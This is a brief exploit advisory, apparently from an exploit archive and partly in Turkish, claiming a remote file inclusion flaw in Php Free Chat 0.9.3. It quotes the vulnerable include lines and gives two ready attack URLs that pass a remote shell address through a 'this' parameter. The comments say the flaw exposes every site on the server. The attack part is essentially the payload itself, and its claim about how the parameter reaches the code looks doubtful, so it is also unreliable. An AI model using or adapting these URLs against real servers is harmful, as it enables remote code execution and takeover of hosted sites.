< ------------------- header data start ------------------- >

#############################################################

# Application Name : Php Free Chat 0.9.3

# Vulnerable Type : Remote File Include

# Infection : Sitede RFI açigina sebep olan hatali kodlamadan faydalanilarak sunucudaki tüm sitelere erisim yapilabilir.

# Bug Fix Advice : Sunucuda çalisan ve RFI açiklarini çalistiran fonksiyonlar disable yapilmali.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

include($this->tpl_filename)
/src/phpfreechattemplate.class.php

include_once($this->aFunctionIncludeFiles[$sFunctionName])
/lib/xajax_0.2.3/xajax.inc.php

Attack:

Site.com/Script/src/phpfreechattemplate.class.php?this=http://Shell?
Site.com/Script/lib/xajax_0.2.3/xajax.inc.php?this=http://Shell?

< -- bug code end of -- >